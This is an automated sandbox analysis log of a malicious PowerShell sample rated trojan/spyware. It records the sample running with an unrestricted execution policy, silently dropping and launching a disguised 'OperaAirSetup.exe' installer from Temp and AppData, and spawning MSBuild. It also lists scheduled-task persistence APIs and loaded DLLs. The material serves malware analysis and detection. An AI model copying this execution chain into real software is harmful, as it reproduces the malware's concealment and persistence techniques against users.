                        Source: 12.2.OperaAirSetup.exe.6050000.13.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                        Source: 12.2.OperaAirSetup.exe.6050000.13.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                        Source: 12.2.OperaAirSetup.exe.6050000.13.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                        Source: 12.2.OperaAirSetup.exe.6050000.13.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                        Source: 12.2.OperaAirSetup.exe.4375570.3.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                        Source: 12.2.OperaAirSetup.exe.4375570.3.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                        Source: 12.2.OperaAirSetup.exe.4375570.3.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 12.2.OperaAirSetup.exe.4375570.3.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                        Source: 12.2.OperaAirSetup.exe.4375570.3.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                        Source: 12.2.OperaAirSetup.exe.6050000.13.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                        Source: 12.2.OperaAirSetup.exe.6050000.13.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                        Source: 12.2.OperaAirSetup.exe.4375570.3.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                        Source: 12.2.OperaAirSetup.exe.6050000.13.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                        Source: 12.2.OperaAirSetup.exe.6050000.13.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                        Source: 12.2.OperaAirSetup.exe.6050000.13.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                        Source: 12.2.OperaAirSetup.exe.4375570.3.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                        Source: 12.2.OperaAirSetup.exe.4375570.3.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                        Source: 12.2.OperaAirSetup.exe.6050000.13.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winPS1@15/31@3/4
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_029B0AD1 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,12_2_029B0AD1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004411E0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,13_2_004411E0
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6552:120:WilError_03
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ueodfvoh.azw.ps1Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCommand line argument: Title12_2_00E9EF66
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCommand line argument: BeginPrompt12_2_00E9EF66
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCommand line argument: Progress12_2_00E9EF66
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCommand line argument: yes12_2_00E9EF66
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCommand line argument: RunProgram12_2_00E9EF66
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCommand line argument: ExecuteFile12_2_00E9EF66
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCommand line argument: InstallPath12_2_00E9EF66
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCommand line argument: %%T12_2_00E9EF66
                        Source: C:\Windows\Temp\cmd.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Windows\Temp\cmd.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                        Source: wEY98gM1Jj.ps1Virustotal: Detection: 14%
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\wEY98gM1Jj.ps1"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\wEY98gM1Jj.ps1"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Temp\cmd.exe "C:\Windows\Temp\cmd.exe"
                        Source: C:\Windows\Temp\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp "C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp" /SL5="$8007C,13626613,119296,C:\Windows\Temp\cmd.exe"
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpProcess created: C:\Windows\Temp\cmd.exe "C:\Windows\Temp\cmd.exe" /VERYSILENT
                        Source: C:\Windows\Temp\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp "C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp" /SL5="$6042A,13626613,119296,C:\Windows\Temp\cmd.exe" /VERYSILENT
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpProcess created: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe "C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe"
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Temp\cmd.exe "C:\Windows\Temp\cmd.exe" Jump to behavior
                        Source: C:\Windows\Temp\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp "C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp" /SL5="$8007C,13626613,119296,C:\Windows\Temp\cmd.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpProcess created: C:\Windows\Temp\cmd.exe "C:\Windows\Temp\cmd.exe" /VERYSILENTJump to behavior
                        Source: C:\Windows\Temp\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp "C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp" /SL5="$6042A,13626613,119296,C:\Windows\Temp\cmd.exe" /VERYSILENTJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpProcess created: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe "C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dllJump to behavior
                        Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dllJump to behavior
                        Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dllJump to behavior
                        Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dllJump to behavior
                        Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\Temp\cmd.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\Temp\cmd.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: msimg32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: shfolder.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\Temp\cmd.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\Temp\cmd.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpSection loaded: msimg32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpSection loaded: shfolder.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpSection loaded: rstrtmgr.dllJump to behavior
